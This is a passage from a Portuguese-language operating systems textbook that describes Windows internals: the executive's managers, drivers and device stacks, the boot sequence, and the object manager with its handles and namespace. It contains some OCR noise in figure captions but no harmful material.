em que o Windows detecta um erro fatal no modo nú- 
cleo e desliga ou reinicializa o sistema. As BSODs são 
comparáveis aos pânicos do núcleo nos sistemas UNIX. 

Em essência, a Microsoft reconhece agora oficial- 
mente o que os pesquisadores do campo de micronúcle- 
os como o MINIX 3 e L4 sabem há anos: quanto mais 
código houver no núcleo, mais erros. Como os drivers 
de dispositivos compreendem cerca de 70% do código 
no núcleo, quanto mais drivers puderem ser movidos 
para processos do modo usuário, onde um erro causa 
apenas a falha de um único driver (em vez de derrubar 
todo o sistema), melhor. É esperado que a tendência em 
mover código do núcleo para processos no modo usuá- 
rio cresça nos próximos anos. 

O gerenciador de E/S também inclui o gerencia- 
mento de recursos plug-and-play e de energia. O plug- 
-and-play entra em ação quando novos dispositivos são 
detectados no sistema. O subcomponente plug-and-play 
é notificado primeiramente; ele trabalha com um servi- 
ço, o gerenciador de recursos plug-and-play do modo 
usuário, para encontrar o driver de dispositivo apropria- 
do e carregá-lo para o sistema. Encontrar o driver de 
dispositivo certo nem sempre é fácil e, algumas vezes, 


depende de uma combinação sofisticada entre a versão 
do dispositivo de hardware e a versão particular dos dri- 
vers. Em alguns casos, um único dispositivo dá suporte 
a uma interface-padrão que é suportada por vários dri- 
vers diferentes, escritos por empresas diferentes. 

Estudaremos mais sobre E/S na Seção 11.7 e sobre 
o mais importante sistema de arquivos, o NTFS, na Se- 
ção 11.8. 

O gerenciamento de energia do dispositivo reduz o 
consumo de energia quando possível, estendendo a vida 
útil das baterias em notebooks e economizando ener- 
gia em desktops e servidores. Acertar no gerenciamento 
de energia pode ser desafiador, uma vez que há muitas 
dependências sutis entre dispositivos e os barramentos 
que os conectam à CPU e à memória. O consumo de 
energia não é afetado apenas por quais dispositivos es- 
tejam ligados, mas também pela frequência de relógio 
da CPU, que também é controlada pelo gerenciador de 
energia do dispositivo. Veremos o consumo de energia 
com mais detalhes na Seção 11.9. 

O gerenciador de processos gerencia a criação e a 
finalização de processos e threads, incluindo estabelecer 
as políticas e parâmetros que os controlam. Todavia, os 
aspectos operacionais dos threads são determinados pela 
camada do núcleo, que controla o escalonamento e a sin- 
cronização dos threads, assim como sua interação com os 
objetos de controle, como APCs. Os processos contêm 
threads, um espaço de endereçamento e uma tabela de des- 
critores com os descritores que o processo pode usar para 
se referir aos objetos do modo núcleo. Os processos tam- 
bém incluem informações necessárias ao escalonador para 
o chaveamento entre espaços de endereçamento e o ge- 
renciamento de informações de hardware específicas para 
processos (como descritores de segmento). Estudaremos o 
gerenciamento de processos e threads na Seção 11.4. 

O gerenciador de memória do executivo implemen- 
ta a arquitetura de memória virtual paginada por deman- 
da. Ele gerencia o mapeamento de páginas virtuais para 
os quadros de páginas físicas, o gerenciamento dos qua- 
dros físicos disponíveis e o gerenciamento do arquivo de 
paginação no disco usado para manter instâncias priva- 
das de páginas virtuais que não estão mais carregadas 
na memória. O gerenciador de memória também fornece 
recursos especiais para grandes aplicações de servidores, 
como bancos de dados e componentes de tempo de exe- 
cução de linguagens de programação, como os coletores 
de lixo. Estudaremos o gerenciamento de memória mais 
adiante neste capítulo, na Seção 11.5. 

O gerenciador de cache aperfeiçoa o desempenho 
de E/S para o sistema de arquivos por meio da manuten- 
ção de uma cache das páginas do sistema de arquivos no 


espaço de endereçamento virtual do núcleo. Ele utiliza 
um caching com endereçamento virtual, ou seja, orga- 
niza páginas na cache em termos de sua localização em 
seus arquivos. Isso difere do caching de blocos físicos 
como no UNIX, em que o sistema mantém uma cache 
dos blocos endereçados fisicamente do volume bruto do 
disco. 

O gerenciamento de cache é implementado com o 
uso de arquivos mapeados. O caching real é realizado 
pelo gerenciador de memória. O gerenciador de cache 
precisa se preocupar somente em decidir quais partes 
de quais arquivos pôr em cache, assegurando que dados 
armazenados em cache sejam descarregados no disco 
em tempo hábil e gerenciando os endereços virtuais do 
núcleo usados para mapear as páginas de arquivos em 
cache. Se uma página necessária para a E/S para um ar- 
quivo não está disponível na cache, a página gerará uma 
falta ao usar o gerenciador de memória. Estudaremos o 
gerenciador de cache na Seção 11.6. 

O monitor de referência de segurança impõe os 
elaborados mecanismos de segurança do Windows, que 
suportam os padrões internacionais de segurança para 
computadores, chamados de critérios comuns, uma evo- 
lução dos requisitos de segurança do Orange Book do 
Departamento de Defesa dos Estados Unidos. Esses pa- 
drões especificam um vasto número de regras que um sis- 
tema em conformidade deve seguir, como autenticação 
de usuários, auditoria, esvaziamento da memória alocada 
e muito mais. Uma das regras requer que toda a verifica- 
ção de acessos seja implementada por um único módulo 
no sistema. No Windows, esse módulo é o monitor de 
referência de segurança no núcleo. Iremos estudar mais 
detalhes do sistema de segurança na Seção 11.10. 

O executivo contém uma série de outros componen- 
tes que descreveremos de forma breve. O gerenciador 
de configuração é o componente do executivo que 
implementa o registro, como descrito antes. O registro 
contém dados de configuração para o sistema em arqui- 
vos do sistema de chamados colmeias. A colmeia mais 
crítica é a SYSTEM, que é carregada na memória no ato 
da inicialização. Só depois que a camada executiva te- 
nha inicializado com sucesso seus componentes princi- 
pais, incluindo os drivers de E/S que se comunicam com 
o disco do sistema, é que a cópia em memória da col- 
meia é reassociada com a cópia no sistema de arquivos. 
Dessa forma, se algo ruim acontecer durante a tentati- 
va de inicialização do sistema, é muito menos provável 
que a cópia no disco seja corrompida. 

O componente LPC fornece uma comunicação en- 
tre processos muito eficiente, usada entre processos 
sendo executados no mesmo sistema. Ele é um dos 
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transportes de dados usados por recursos de chamada 
de procedimento remota (RPC — Remote Procedu- 
re Call) baseados em padrões para implementar o es- 
tilo de computação cliente/servidor. A RPC também 
usa pipes nomeados (named pipes) e TCP/IP como 
transportes. 

A LPC foi reforçada de modo substancial no Win- 
dows 8 (agora ela é chamada de ALPC, Advanced 
LPC — de LPC avançada) para oferecer suporte para 
novas funções na RPC, incluindo RPC de componen- 
tes do modo núcleo, como os drivers. A LPC era um 
componente muito importante no projeto original do 
NT porque era usada pela camada de subsistema para 
implementar a comunicação entre as rotinas de stubs de 
bibliotecas que eram executadas em cada processo e o 
processo de subsistema que implementa as facilidades 
comuns à personalidade particular de um sistema ope- 
racional, como o Win32 ou o POSIX. 

O Windows 8 implementou um serviço de publicar/ 
assinar, chamado WNF (Windows Notification Facili- 
ty). Notificações WNF são baseadas em alterações em 
uma instância dos dados de estado WNF. Um publica- 
dor declara uma instância de dados de estado (até 4 KB) 
e diz ao sistema operacional por quanto tempo deverá 
mantê-la (por exemplo, até a próxima reinicialização ou 
permanentemente). Um publicador atualiza o estado de 
forma indivisível, conforme a necessidade. Os assinan- 
tes podem se organizar para executar o código sempre 
que uma instância dos dados de estado for modificada 
por um publicador. Como as instâncias de estado WNF 
contêm uma quantidade fixa de dados pré-alocados, 
não há enfileiramento de dados, como na IPC baseada 
em mensagem — com todos os problemas de gerencia- 
mento de recursos do atendente. Os assinantes têm a 
garantia de que só verão a versão mais recente de uma 
instância de estado. 

Essa abordagem baseada em estado dá ao serviço 
WNF sua principal vantagem em relação a outros meca- 
nismos de IPC: publicadores e assinantes são distintos 
e podem iniciar e terminar de forma independente um 
do outro. Os publicadores não precisam ser executados 
na inicialização apenas para inicializar suas instâncias 
de estado, pois o sistema operacional poderá mantê-las 
entre as diversas reinicializações. Os assinantes em ge- 
ral não precisam se preocupar com os valores passados 
das instâncias de estado quando começarem a execu- 
tar, pois tudo o que precisarão saber sobre o histórico 
do estado está encapsulado no estado atual. Em cená- 
rios onde os valores de estado passados não puderem 
ser razoavelmente encapsulados, o estado atual poderá 
fornecer metadados para o gerenciamento do estado 
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histórico, digamos, em um arquivo ou em um objeto 
de seção salvo, usado como buffer circular. WNF faz 
parte das APIs nativas do NT e (ainda) não é exposto 
por meio das interfaces Win32. Porém, ele é bastante 
utilizado internamente pelo sistema para implementar 
APIs Win32 e WinRT. 

No Windows NT 4.0, muito do código relacionado 
à interface gráfica do Win32 foi passado para o núcleo 
porque o hardware da época não podia oferecer o de- 
sempenho necessário. Esse código residia antes no 
processo de subsistema csrss.exe que implementava as 
interfaces do Win32. O código da GUI baseada no nú- 
cleo reside em um driver especial de núcleo, win32k. 
sys. Esperava-se que essa mudança melhorasse o de- 
sempenho do Win32, porque as transições extras entre 
modo núcleo/modo usuário e o custo do chaveamento 
de espaços de endereçamento para implementar a co- 
municação via LPC haviam sido eliminados. Entretanto, 
não tem sido tão bem-sucedido quanto esperado porque 
os requisitos do código sendo executado no núcleo são 
muito estritos, e o custo adicional de execução no modo 


núcleo superou alguns dos ganhos na redução de custos 
de chaveamentos. 


Os drivers de dispositivos 


A parte final da Figura 11.11 consiste em drivers 
de dispositivos. No Windows, eles são bibliotecas de 
ligação dinâmica (DLLs), carregadas pelo executivo do 
NTOS. Embora eles sejam usados principalmente para 
implementar os drivers para hardwares específicos, 
como dispositivos físicos e barramentos de E/S, o me- 
canismo do driver de dispositivo também é usado como 
o mecanismo geral de extensibilidade do modo núcleo. 
Como já descrito, grande parte do subsistema do Win32 
é carregada como um driver. 

O gerenciador de E/S organiza um caminho de fluxo 
de dados para cada instância de um dispositivo, como 
exibido na Figura 11.14. Esse caminho é chamado de pi- 
lha de dispositivos e consiste em instâncias privadas de 
objetos de dispositivos do núcleo, alocados para o cami- 
nho. Cada objeto de dispositivo na pilha de dispositivos 


[FIGURA 11.14] Descrição simplificada das pilhas de dispositivos para dois volumes de arquivos NTFS. O pacote de solicitação de E/S 
é passado pilha abaixo. As rotinas apropriadas dos drivers associados são chamadas a cada nível na pilha. As próprias 
pilhas de dispositivos consistem em objetos de dispositivos alocados especificamente para cada pilha. 
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é ligado a um objeto de driver particular, que contém 
a tabela de rotinas a serem usadas para os pacotes de 
solicitação de E/S que fluem pela pilha de dispositivos. 
Em alguns casos, os dispositivos na pilha representam 
drivers cujo único propósito é filtrar as operações de 
E/S direcionadas a um dispositivo, barramento ou dri- 
ver de rede em particular. A filtragem é usada por di- 
versas razões. Algumas vezes o pré-processamento ou 
pós-processamento de operações de E/S resulta em uma 
arquitetura mais limpa, enquanto em outras vezes é ape- 
nas pragmático, porque as fontes ou os direitos de mo- 
dificar um driver não estão disponíveis, e a filtragem 
é usada para contornar isso. Os filtros também podem 
implementar novas funcionalidades, como transformar 
discos em partições ou vários discos em volumes RAID. 

Os sistemas de arquivos são carregados como dri- 
vers. Cada instância de um volume para um sistema de 
arquivos tem um objeto de dispositivo criado como par- 
te da pilha de dispositivos para aquele volume. O objeto 
de dispositivo será ligado ao objeto de driver para o sis- 
tema de arquivos apropriado à formatação do volume. 
Drivers de filtro especiais, chamados drivers de filtro 
do sistema de arquivos, podem inserir objetos de dis- 
positivos antes que o objeto de dispositivo do sistema 
de arquivos aplique funcionalidade às solicitações de 
E/S enviadas a cada volume, assim como procurar por 
vírus na leitura ou gravação de dados. 

Os protocolos de rede, como a implementação inte- 
grada do TCP/IP IPv4/IPv6 do Windows, também são 
carregados usando o modelo de E/S. Para compatibili- 
dade com os antigos Windows baseados em MS-DOS, 
o driver de TCP/IP implementa um protocolo especial 
para se comunicar com interfaces de rede acima do mo- 
delo de E/S do Windows. Há outros drivers que também 
implementam essas medidas, os quais são chamados 
pelo Windows de miniportas. A funcionalidade com- 
partilhada está em um driver de classe. Por exemplo, 
funcionalidades comuns para discos SCSI ou IDE ou 
dispositivos USB são fornecidas por um driver de classe, 
ao qual os drivers de miniporta para cada tipo específico 
desses dispositivos são ligados como uma biblioteca. 

Não discutiremos qualquer driver de dispositivo em 
particular neste capítulo, mas apresentaremos mais de- 
talhes sobre como o gerenciador de E/S interage com os 
drivers de dispositivo na Seção 11.7. 


11.3.2 Inicialização do Windows 


Fazer um sistema operacional executar requer várias 
etapas. Quando um computador é ligado, a CPU é ini- 
cializada pelo hardware e configurada para inicializar a 
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execução de um programa na memória. Contudo, o único 
código disponível está em uma forma não volátil de me- 
mória CMOS, que é inicializada pelo fabricante do com- 
putador (e algumas vezes atualizada pelo usuário em um 
processo chamado flashing). Visto que o software persis- 
te na memória, e só é atualizado raramente, ele é chama- 
do de firmware. O firmware é carregado nos PCs pelo 
fabricante da placa-mãe ou do próprio computador. His- 
toricamente, o firmware do PC era um programa deno- 
minado BIOS (Basic Input/Output System — sistema 
básico de entrada/saída), mas a maioria dos computado- 
res novos utiliza a UEFI (Unified Extensible Firmware 
Interface — Interface de firmware extensível unificada). 
UEFI é melhor que o BIOS por dar suporte ao hardware 
moderno, oferecer uma arquitetura mais modular, inde- 
pendente da CPU, e dar suporte a um modelo de extensão 
que simplifica a inicialização por redes, a provisão para 
novas máquinas e a execução de diagnósticos. 

A finalidade principal de qualquer firmware é iniciar 
o sistema operacional, carregando primeiro pequenos 
programas de inicialização encontrados no início das 
partições da unidade de disco. Os programas de ini- 
cialização do Windows sabem como obter informação 
suficiente de um volume de sistema de arquivos para 
encontrar o programa autônomo do Windows BootMgr. 
O BootMgr determina se o sistema estava antes em hi- 
bernação ou em modo de espera (modos especiais de 
economia de energia que permitem ao sistema voltar à 
ativa sem ter de iniciar todo o processo novamente). Se 
for esse o caso, o BootMgr carrega e executa o WinRe- 
sume.exe; do contrário, ele carrega e executa o WinLo- 
ad.exe para realizar uma nova inicialização. O WinLoad 
carrega os componentes de inicialização do sistema para 
a memória: o núcleo/executivo (normalmente o ntoskr- 
nl.exe), a HAL (hal.dil), o arquivo contendo a colmeia 
SYSTEM, o driver Win32k.sys contendo as partes do 
subsistema do Win32 do modo núcleo, assim como 
imagens de quaisquer outros drivers listados na colmeia 
SYSTEM como drivers de inicialização (ou boot) — 
significando que são necessários quando o sistema rea- 
liza uma primeira inicialização. 

Uma vez que os componentes de inicialização do 
Windows estejam carregados na memória, é dado con- 
trole para o código de baixo nível do NTOS, que procede 
à inicialização da HAL, camadas de núcleo e executiva, 
a ligação nas imagens de drivers e o acesso/atualização 
de dados de configuração na colmeia SYSTEM. Após 
todos os componentes do modo núcleo serem iniciali- 
zados, o primeiro processo do modo usuário é criado e 
usado para executar o programa smss.exe (que se parece 
com o /etc/init nos sistemas UNIX). 
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Versões recentes do Windows oferecem suporte para 
melhorar a segurança do sistema no momento da ini- 
cialização. Muitos PCs mais novos contêm um TPM 
(Trusted Platform Module — Módulo de plataforma 
confiável), que é um chip na placa-mãe. O chip é um 
processador criptográfico seguro, que protege segredos, 
como chaves de encriptação/decriptação. O TPM do 
sistema pode ser usado para proteger chaves do sistema, 
como aquelas usadas pelo BitLocker para criptografar o 
disco. As chaves protegidas não são reveladas ao siste- 
ma operacional antes que o TPM tenha verificado se um 
invasor tentou mexer nelas. Ele também pode oferecer 
outras funções criptográficas, como assegurar a siste- 
mas remotos que o sistema operacional no sistema local 
não foi comprometido. 

Os programas de inicialização do Windows têm ló- 
gica para lidar com os problemas comuns que o usuário 
encontra quando a inicialização do sistema falha. Algu- 
mas vezes a instalação de um driver de dispositivo com 
defeito, ou a execução de um programa como o regedit 
(que pode corromper a colmeia SYSTEM), impede o 
sistema de realizar uma inicialização normal. Há supor- 
te para ignorar mudanças recentes e realizar a iniciali- 
zação para a última configuração conhecida do sistema. 
Outras opções de inicialização incluem a inicialização 
segura, que desliga muitos dos drivers opcionais, e o 
console de recuperação, que dispara uma janela de li- 
nha de comando cmd.exe, proporcionando uma expe- 
riência similar ao modo monousuário do UNIX. 

Outro problema comum para os usuários tem sido 
que, de forma ocasional, alguns sistemas do Windows 
possuem comportamentos estranhos, com travamentos 
frequentes (aparentemente aleatórios), tanto no sistema 
como nas aplicações. Dados obtidos pelo programa de 
análise de travamentos on-line da Microsoft forneceram 
evidências de que muitos desses travamentos se deviam 
à memória física defeituosa; logo, o processo de inicia- 
lização do Windows oferece a opção de executar um 
diagnóstico extenso de memória. Talvez no futuro os 
hardwares de computador suportem de modo comum o 
ECC (ou talvez paridade) para memória, mas a maioria 
dos sistemas de PCs desktop, notebooks e sistemas portá- 
teis de hoje está vulnerável até aos erros de um único bit 
em meio aos bilhões de bits de memória que eles contêm. 


11.3.3 A implementação do gerenciador de objetos 


O gerenciador de objetos é talvez o componente mais 
importante no executivo do Windows, razão pela qual já 
termos introduzido muitos de seus conceitos. Como já 
dissemos, ele fornece uma interface consistente e 


uniforme para gerenciar os recursos de sistema e estrutu- 
ras de dados, como abrir arquivos, processos, threads, se- 
ções de memória, temporizadores, dispositivos, drivers e 
semáforos. Até os objetos mais especializados, represen- 
tando coisas como transações do núcleo, perfis, tokens 
de segurança e áreas de trabalho do Win32, são geridos 
pelo gerenciador de objetos. Os objetos de dispositivos 
interligam as descrições do sistema de E/S, incluindo 
a oferta de ligação entre o espaço de nomes do NT e 
os volumes do sistema de arquivos. O gerenciador de 
configuração usa um objeto do tipo chave para se ligar 
às colmeias do registro. O próprio gerenciador de obje- 
tos tem objetos que ele utiliza para administrar o espaço 
de nomes do NT e implementar os objetos usando um 
recurso comum. Eles são objetos de diretório, ligação 
simbólica e tipo de objeto. 

A uniformidade oferecida pelo gerenciador de objetos 
tem muitas facetas. Todos esses objetos usam o mesmo 
mecanismo de como são criados, destruídos e contabili- 
zados no sistema de cotas. Todos podem ser acessados 
por processos do modo usuário usando descritores. Há 
uma convenção unificada para o gerenciamento de refe- 
rências de ponteiros para objetos a partir do núcleo. Os 
objetos podem ser nomeados no espaço de nomes do NT 
(que é gerenciado pelo gerenciador de objetos). Objetos 
despachantes (que começam com a estrutura comum de 
eventos de sinalização) podem usar interfaces comuns 
de sincronização e notificação, como WaitForMultiple- 
Objects. Há o sistema de segurança comum com ACLs 
impostas aos objetos abertos pelo nome e verificações de 
acesso a cada uso de um descritor. Há até recursos para 
ajudar os desenvolvedores do modo núcleo a depurar 
problemas traçando o uso de objetos. 

O principal para entender os objetos é perceber que 
um objeto (do executivo) é apenas uma estrutura de da- 
dos na memória virtual acessível para o modo núcleo. 
Essas estruturas de dados são, de modo geral, usadas 
para representar conceitos mais abstratos. Como exem- 
plos, objetos de arquivos do executivo são criados para 
cada instância de um arquivo do sistema de arquivos 
que foi aberto, e objetos de processo são criados para 
representar cada processo. 

Uma consequência do fato de que os objetos são 
apenas estruturas de dados do modo núcleo é que, quan- 
do o sistema reinicializa (ou trava), todos os objetos são 
perdidos. Quando acontece a inicialização do sistema, 
não há objetos presentes, nem mesmo os descritores de 
tipos de objetos. Todos os tipos de objetos, e os pró- 
prios objetos, devem ser criados de forma dinâmica por 
outros componentes da camada executiva, chamando 
as interfaces oferecidas pelo gerenciador de objetos. 


Quando os objetos são criados e um nome é especifica- 
do, eles podem depois ser referenciados pelo espaço de 
nomes do NT. Logo, construir os objetos na inicializa- 
ção do sistema também serve para a criação do espaço 
de nomes do NT. 

Os objetos têm uma estrutura, exibida na Figura 
11.15. Cada um contém um cabeçalho com certas in- 
formações comuns a todos os objetos de todos os tipos. 
Os campos nesse cabeçalho incluem o nome do objeto, 
o diretório em que ele reside no espaço de nomes do NT 
e um ponteiro para um descritor de segurança represen- 
tando a ACL para o objeto. 

A memória alocada para os objetos vem de um dos 
dois heaps (ou pools) de memória mantidos pela ca- 
mada executiva. Há funções utilitárias (parecidas com 
malloc) no executivo que permitem aos componentes 
do modo núcleo alocar tanto a memória de núcleo pagi- 
navel quanto a não paginável. A memoria não paginável 
é necessária para qualquer estrutura de dados ou objeto 
do modo núcleo que precise ser acessado por um nível 2 
de prioridade de CPU ou maior. Isso inclui ISRs e DPCs 
(mas não APCs) e o próprio escalonador de threads. O 
descritor de falta de página também precisa que suas 
estruturas de dados sejam alocadas de memória não pa- 
ginável de núcleo para evitar recursão. 

A maior parte das alocações com origem no ge- 
renciador de heaps do núcleo é atingida usando listas 
lookaside, que contêm listas LIFO de alocações do mes- 
mo tamanho, para cada processador. Essas LIFOs são 
otimizadas para operação livre de bloqueios, aumentan- 
do o desempenho e a escalabilidade do sistema. 

Cada cabeçalho de objeto contém um campo de en- 
cargo de cota, que é o custo cobrado ao processo para a 
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abertura daquele objeto. As cotas são usadas para impe- 
dir que um usuário utilize muitos recursos do sistema. 
Há limites separados para memória não paginável de 
núcleo (que requer a alocação tanto de memória fisi- 
ca como de endereços virtuais do núcleo) e memória 
paginável de núcleo (que utiliza endereços virtuais do 
núcleo). Quando o custo acumulado para qualquer dos 
tipos de memória atinge o limite de cota, as alocações 
do processo falham em razão da insuficiência de re- 
cursos. As cotas também são usadas pelo gerenciador 
de memória, para controlar o tamanho do conjunto de 
trabalho, e pelo gerenciador de threads, para limitar a 
frequência de uso da CPU. 

Tanto a memória física quanto os endereços virtuais 
do núcleo são recursos valiosos. Quando um objeto não 
é mais necessário, ele deve ser removido e sua memó- 
ria e endereços devolvidos ao sistema. Mas, se um objeto 
é reivindicado enquanto ainda está em uso, a memória 
pode ser alocada para um novo objeto, e então é provável 
que as estruturas de dados sejam corrompidas. Isso é fácil 
de ocorrer na camada executiva do Windows porque ela 
é altamente multithread e implementa várias operações 
assincronas (funções que retornam ao chamador antes de 
terminar o serviço nas estruturas de dados que recebem). 

Para evitar a liberação prematura de objetos em 
decorrência de condições de corrida, o gerenciador de 
objetos implementa um mecanismo de contagem de re- 
ferências e o conceito de ponteiro referenciado, que é 
necessário para acessar um objeto sempre que ele esti- 
ver sob risco de ser apagado. Dependendo das conven- 
ções acerca de cada tipo particular de objeto, há apenas 
alguns momentos específicos em que um objeto pode 
ser apagado por outro thread. Em outros momentos, a 


lean A estrutura de um objeto do executivo gerenciado pelo gerenciador de objetos. 










Nome do objeto 
Diretório no qual o objeto reside 
Cabeçalho 

do objeto < 


Contagem de referéncias 
Ponteiro para o tipo de objeto 


Dados < 
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Dados especificos do objeto 


Informação de segurança (quem pode usar o objeto) 
Encargos de cota (custos para utilizar o objeto) 
Lista de processos com descritores 








Método Open 
Método Close 


Método Delete 
Método Query name 
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622| | SISTEMAS OPERACIONAIS MODERNOS 


utilização de travas, dependências entre estruturas de 
dados e até o fato de nenhum outro thread ter um pon- 
teiro para um objeto são suficientes para impedir que o 
objeto seja apagado de forma prematura. 


Descritores (handles) 


As referências do modo usuário para objetos do 
modo núcleo não podem utilizar-se de ponteiros, pois 
eles são muito difíceis de validar. Em vez disso, os ob- 
jetos do modo núcleo devem ser nomeados de alguma 
outra forma para que o código de usuário possa fazer re- 
ferências a eles. O Windows usa descritores para fazer 
referência a objetos do modo núcleo. Esses descritores 
são valores opacos convertidos pelo gerenciador de ob- 
jetos em referências a estruturas de dados específicas 
do modo núcleo que representam um objeto. A Figura 
11.16 apresenta a estrutura de dados da tabela de descri- 
tores usada para traduzir os descritores em ponteiros de 
objetos. A tabela de descritores é expansível por meio 
da adição de camadas extras de indireção. Cada pro- 
cesso tem sua própria tabela, incluindo o processo de 
sistema que contém os threads do núcleo não associados 
a um processo do modo usuário. 


[FIGURA 11.16) Estrutura de dados de uma tabela de descritores 
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A Figura 11.17 apresenta uma tabela de descrito- 
res com duas camadas extras de indireção, o máximo 
suportado. Em alguns casos, é conveniente que o có- 
digo em execução no modo núcleo seja capaz de usar 
descritores no lugar de ponteiros referenciados. Estes 
são chamados descritores do núcleo e codificados de 
maneira especial para que possam ser diferenciados 
dos descritores do modo usuário. Eles são mantidos nas 
tabelas de descritores dos processos de sistema e não 
podem ser acessados pelo modo usuário. Assim como 
a maior parte do espaço de endereçamento virtual do 
núcleo é compartilhada por todos os processos, a tabe- 
la de descritores do sistema é compartilhada por todos 
os componentes do núcleo, não importando qual seja o 
atual processo do modo usuário. 

Os usuários podem criar novos objetos ou abrir aque- 
les já existentes fazendo chamadas do Win32 como Cre- 
ateSemaphore ou OpenSemaphore, que são chamadas 
para procedimentos de biblioteca que, no fim das con- 
tas, resultam na realização da chamada de sistema apro- 
priada. O resultado de qualquer chamada bem-sucedida 
que cria ou abre um objeto é um item de tabela de des- 
critores, com 64 bits, que é gravado na tabela privada de 
descritores do processo na memória do núcleo. O índi- 
ce, com 32 bits, da posição lógica do descritor na tabela 
é retornado ao usuário para ser usado em chamadas pos- 
teriores. A entrada na tabela de descritores, com 64 bits, 
no núcleo contém duas palavras de 32 bits. Uma contém 
um ponteiro com 29 bits para o cabeçalho do objeto; os 
outros 3 bits são usados como flags (por exemplo, se o 
descritor é herdado pelos processos que ele cria) e são 
“desmascarados” antes de o ponteiro ser seguido. A ou- 
tra palavra contém uma máscara de direitos com 32 bits, 
que é necessária porque a verificação de permissões é 
feita apenas no momento em que o objeto é criado ou 
aberto. Se um processo só tem permissão de leitura para 
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um objeto, todos os outros bits na máscara serão 0, per- 
mitindo ao sistema operacional rejeitar qualquer outra 
operação no objeto além de leitura. 


O espaço de nomes do objeto 


Os processos podem compartilhar objetos duplican- 
do um descritor para o objeto nos outros processos, mas 
isso requer que o processo que está duplicando tenha 
descritores de outros processos, o que é impraticável 
em muitas situações, como quando os processos que es- 
tão compartilhando um objeto não são relacionados ou 
quando são protegidos uns dos outros. Em outros casos, 
é importante que os objetos persistam mesmo quando 
não estão sendo usados por nenhum processo, como ob- 
jetos de dispositivos representando dispositivos físicos, 
ou volumes montados, ou os objetos usados para imple- 
mentar o próprio gerenciador de objetos no espaço de 
nomes do NT. Para resolver o compartilhamento geral 
e os requisitos de persistência, o gerenciador de objetos 
permite que objetos arbitrários sejam nomeados no es- 
paço de nomes do NT quando são criados. Entretanto, é 
responsabilidade do componente do executivo, que ma- 
nipula objetos de tipos particulares, fornecer as interfa- 
ces que dão suporte ao uso das facilidades de nomeação 
do gerenciador de objetos. 

O espaço de nomes do NT é hierárquico, com o 
gerenciador de objetos implementando diretórios e 
ligações simbólicas. O espaço de nomes também é 
extensível, permitindo que qualquer tipo de objeto es- 
pecifique extensões para ele, fornecendo uma rotina 
chamada Parse. A rotina Parse é um dos procedimen- 
tos que podem ser fornecidos para cada objeto em sua 
criação, como exibido na Figura 11.18. 

O procedimento Open é pouco usado porque o com- 
portamento padrão do gerenciador de objetos é, de maneira 
usual, o necessário; logo, esse procedimento é especifica- 
do como NULL para quase todos os tipos de objeto. 
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Os procedimentos Close e Delete representam diferen- 
tes estados causados no objeto. Quando o último descritor 
para um objeto é fechado, pode haver ações necessárias 
para limpar o estado, que são realizadas pelo procedimen- 
to Close. Quando a última referência de ponteiro é remo- 
vida do objeto, o procedimento Delete é chamado para 
que o objeto possa ser preparado para ser apagado e sua 
memória seja reutilizada. Com objetos de arquivo, os dois 
procedimentos são implementados como callbacks para o 
gerenciador de E/S, que é o componente que declarou o 
tipo do objeto de arquivo. As operações do gerenciador de 
objetos resultam em operações de E/S que são enviadas 
pela pilha de dispositivos associada ao objeto de arquivo, 
e o sistema de arquivos faz a maior parte do trabalho. 

O procedimento Parse é usado para abrir ou criar 
objetos, como arquivos e chaves de registro, que esten- 
dem o espaço de nomes do NT. Quando o gerenciador 
de objetos está tentando abrir um objeto pelo nome e 
encontra um nó folha na parte do espaço de nomes que 
gerencia, ele verifica se o tipo do objeto de nó folha tem 
um procedimento Parse especificado; se tiver, ele invo- 
ca o procedimento, passando qualquer parte não usada 
do caminho. Usando mais uma vez os objetos de arqui- 
vo como exemplo, o nó folha é um objeto de dispositivo 
representando um volume de sistema de arquivos em 
particular. O procedimento Parse é implementado pelo 
gerenciador de E/S e resulta em uma operação de E/S 
para o sistema de arquivos para preencher um objeto de 
arquivo em referência a uma instância aberta do arquivo 
ao qual o caminho se refere no volume. Mais adiante, 
exploraremos passo a passo esse exemplo particular. 

O procedimento Query Name é usado para procurar o 
nome associado a um objeto. O procedimento Security 
é usado para obter, configurar ou apagar os descritores 
de segurança em um objeto. Para a maioria dos tipos de 
objetos esse procedimento é fornecido como ponto de 
entrada padrão ao componente do monitor de referência 
de segurança do executivo. 


lei) W RES Procedimentos de objeto fornecidos na especificação de um novo tipo de objeto. 





























Procedimento Quando é chamado Notas 
Open Para cada novo descritor Usado raramente 
Parse Para tipos de objeto que estendem o espaço de nomes Usado para arquivos e chaves de registro 
Close No último fechamento do descritor Limpa os efeitos colaterais visíveis 
Delete Na remoção da última referência de ponteiro O objeto está para ser apagado 
Security Obter ou configurar o descritor de segurança Proteção 
QueryName Obter o nome do objeto Raramente usado fora do núcleo 
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Note que os procedimentos na Figura 11.18 não re- 
alizam as operações mais úteis para cada tipo de objeto, 
como leitura ou gravação em arquivos (ou descer e subir 
em semáforos). Em vez disso, os procedimentos do ge- 
renciador de objetos fornecem funções necessárias para 
configurar corretamente o acesso aos objetos e limpar os 
objetos quando terminar com eles. Os objetos se tornam 
úteis pelas APIs que operam sobre as estruturas de dados 
que os objetos contêm. Chamadas do sistema, como NtRe- 
adFile e NtWriteFile, utilizam a tabela de descritores do 
processo, criada pelo gerenciador de objetos para traduzir 
um descritor em um ponteiro referenciado no objeto sub- 
jacente, como um objeto de arquivo, que contém os dados 
necessários para implementar as chamadas do sistema. 

Além dos callbacks de tipo de objeto, o gerenciador 
de objetos também fornece um conjunto de rotinas ge- 
néricas de objeto para operações, como criar objetos e 
tipos de objetos, duplicar descritores, obter um pontei- 
ro referenciado de um descritor ou um nome, adicionar 
e subtrair contagens de referência para o cabeçalho do 
objeto e NtClose (a função genérica que fecha todos os 
tipos de descritores). 

Ainda que o espaço de nomes do objeto seja crucial 
para a operação inteira do sistema, poucas pessoas sabem 
que ele existe, porque não é visível para os usuários sem 
ferramentas especiais de visualização. Uma dessas ferra- 
mentas é a winobj, disponível gratuitamente em <www. 
microsoft.com/technet/sysinternals>. Quando executa- 
da, essa ferramenta exibe um espaço de nomes de um 
objeto que normalmente contém os diretórios de objeto 
listados na Figura 11.19, bem como alguns outros. 


O diretório com nome estranho \?? contém a identi- 
ficação de todos os nomes de dispositivos no estilo do 
MS-DOS, como 4: para o disquete e C: para o primei- 
ro disco rígido. Esses nomes são, na verdade, ligações 
simbólicas para o diretório Device, onde os objetos de 
dispositivo residem. O nome \?? foi escolhido para tor- 
ná-lo o primeiro em ordem alfabética, a fim de acelerar 
a pesquisa de todos os nomes de caminho começando 
com uma letra de unidade. O conteúdo dos outros dire- 
